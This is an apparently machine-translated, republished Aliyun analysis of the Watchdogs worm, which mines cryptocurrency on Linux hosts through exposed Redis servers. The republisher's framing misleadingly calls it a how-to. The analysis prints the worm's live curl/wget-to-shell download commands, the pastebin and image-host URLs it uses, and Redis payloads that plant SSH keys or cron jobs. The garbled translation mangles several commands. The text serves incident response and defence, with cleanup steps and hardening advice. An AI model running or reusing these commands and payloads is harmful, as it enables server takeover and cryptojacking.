Shulou(Shulou.com)05/31 Report--

This article introduces how to use Watchdogs to implement large-scale mining, the content is very detailed, interested friends can use for reference, I hope it can be helpful to you.

Background

At about 17:00 on February 20, Aliyun Safety monitored a large-scale mining incident, determined that it was caused by the Watchdogs worm, and carried out emergency treatment at the first time.

The worm causes a large number of Linux hosts to fall in a short time. On the one hand, it uses two common configuration problems of Redis unauthorized access and weak password to spread, on the other hand, it reads the ip list from the known_hosts file, which is used to log in to other hosts that trust the host. Neither of these two means of transmission has been used for worms for the first time, but they combine to exert great power.

However, Watchdogs is not the first Redis worm to have such an impact. Up to now, Redis configuration problems have been attacked and exploited by more than 40 kinds of worms; in addition, the configuration problems of other kinds of databases will not be the target of hackers in the future.

Therefore, how to analyze the Watchdogs mining worm and provide cleaning suggestions, but also analyze the development trend of the database worm, and give suggestions for the emergency and prevention of similar large-scale intrusion events.

Brief introduction of Watchdogs mining worm

The infection path of the worm is shown in the following figure.

Cdn.com/2263586317fbd3bd3031398a8e039908aaa6f9f9.png ">

Worm propagation mode

The attacker first scans for Redis with unauthorized access or weak passwords, and controls the corresponding host to request the following address:

Https://pastebin.com/raw/sByq0rym

This address contains commands that request, base64 decode, and execute the contents of another url address:

(curl-fsSL https://pastebin.com/raw/D8E71JBJ||wget-Q-O-https://pastebin.com/raw/D8E71JBJ)|base64-d | sh

The content of https://pastebin.com/raw/D8E71JBJ is decoded into a bash script, which contains instructions to download the malicious program Watchdogs.

(curl-fsSL http://thyrsi.com/t6/672/1550667479x1822611209.jpg-o / tmp/watchdogs | | wget-Q http://thyrsi.com/t6/672/1550667479x1822611209.jpg-O / tmp/watchdogs) & & chmod + x / tmp/watchdogs

As shown in the figure above, the horizontal propagation of the worm is divided into two parts.

First, the Bash script contains the following contents, which will directly read the / root/.ssh/known_hosts and / root/.ssh/id_rsa.pub files on the host, which are used to log in to the machines that trust the current host and control these machines to execute malicious instructions.

The second is the Watchdogs program downloaded by the Bash script, which spreads horizontally through the unauthorized access and blasting of Redis and the blasting of SSH.

Specifically, in the Bbgo () function of the Watchdogs program, the list of ip to be attacked is first obtained

Then try to log in to the ssh service of another host, and execute the malicious script download command once the login is successful.

Malicious Bash script

In addition to downloading Watchdogs programs and horizontal propagation, Bash scripts also have the following functions

1. Add the instruction to download yourself to the crontab scheduled task and execute it every 10 minutes

Kill other processes that take up more than 80% of cpu

1.LibiosetWrite ()

This function mainly performs the writing of libioset.so files.

3.KsoftirqdsWriteRun ()

Decompress and write to the mining program and its configuration file

Here is an example of the unlink () function that must be called to execute the rm command.

It only calls the normal unlink () on files that do not contain the strings "ksoftirqds", "ld.so.preload" and "libioset.so", so that several files cannot be deleted normally.

Where the forge_proc_cpu () function returns a hard-coded string

And the mainstream methods of attacking Redis itself have gone through three stages.

1. Attackers write ssh key to Redis servers with unauthorized access, allowing them to log in to the ssh service without hindrance

Specifically, execute the following payload

Config set dir / root/.ssh/config set dbfilename authorized_keysset x "\ n\ n\ nssh-rsa [sshkey] root@kali\ n\ n\ n" save

Where [sshkey] represents the attacker's key

two。 Attackers write crontab files to Redis servers with unauthorized access and regularly perform malicious operations

Specifically, execute the following payload

Config set dir / var/spool/cronconfig set dbfilename rootset x "[evil command]" save

Where [evil command] indicates a malicious command executed on a regular basis.

3. In the above two stages, only the Redis can be accessed without authentication at all, and the third stage begins to attack the Redis with a weak password, which further expands the scope of the attack.

However, Redis is not the only database that has been hacked. As shown in the table below, the security problems of commonly used databases such as SQL Server, Mysql and Mongodb are also exploited by multiple mining botnets, focusing on unauthorized access, password blasting and vulnerability exploitation.

Methods of repairing and cleaning Watchdogs intrusion

1. First stop the cron service to avoid repeated downloading and execution of malicious files as a result of its continuous execution.

If the operating system can use the service command, execute

Service crond stop

If there is no service command, execute

/ etc/init.d/cron stop

two。 Then use busybox to delete the following two so files:

Sudo busybox rm-f / etc/ld.so.preloadsudo busybox rm-f / usr/local/lib/libioset.sosudo ldconfig

Busybox is a small set of unix tools, and many Linux systems are integrated when installed. It is used for deletion because the rm command that comes with the system needs to make dynamic so library calls, while the so library is maliciously hook and cannot be deleted normally, while the rm of busybox is statically compiled, so there is no need to call the so file, so it is not affected.

3. Clean up malicious processes

Sudo kill-9 `ps-ef | grep Watchdogs | grep-v grep | awk'{print $2} '`sudo kill-9' ps-ef | grep ksoftirqds | grep-v grep | awk'{print $2}'`

4. Clean up the cron-related files and restart the service by checking the following files and clearing them for malicious instructions:

/ var/spool/cron/crontabs/root/var/spool/cron/root/etc/cron.d/root

Execute after

Service crond start

Or

/ etc/init.d/cron start security recommendations

The acquisition of digital cryptocurrency relies on the nature of computing resources, which gives rise to the motivation and soil for hackers to carry out large-scale intrusions; database intrusions such as the Watchdogs worm are not the first and will not be the last. As a "write-as-you-write" platform, Aliyun provides a good security infrastructure and a wealth of security products to help users resist mining and intrusion, as well as the following security recommendations:

1. Before the intrusion occurs, strengthen the password of the database service, try not to open the database service on the Internet, or carry out access control (ACL) according to the actual situation. These measures can help effectively prevent mining, extortion and other attacks. At ordinary times, we should also pay attention to backing up data and pay attention to security product alarm.

two。 If it is suspected that the host has been invaded and mined, for users who know their own security, in the case of simple means of the attacker, they can lock the source of the intrusion by self-checking cpu usage, running processes, scheduled tasks and so on.

3. For attacks in which attackers use more hidden methods (such as this Watchdogs worm, which invalidates ps, top and other system commands), it is recommended to use Aliyun Security's next-generation cloud firewall product, which blocks malicious outreach and can configure intelligent policies, which can effectively help prevent intrusion. No matter how clever the attacker is in hiding on the host, downloading, digging, and bouncing shell require malicious outreach; the interception of the cloud firewall will completely block the attack chain. In addition, users can also directly block pastebin.com, thrysi.com and other websites widely used by mining worms through custom policies to block the intrusion.

On how to use Watchdogs to implement large-scale mining is shared here, I hope the above content can be of some help to you, can learn more knowledge. If you think the article is good, you can share it for more people to see.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.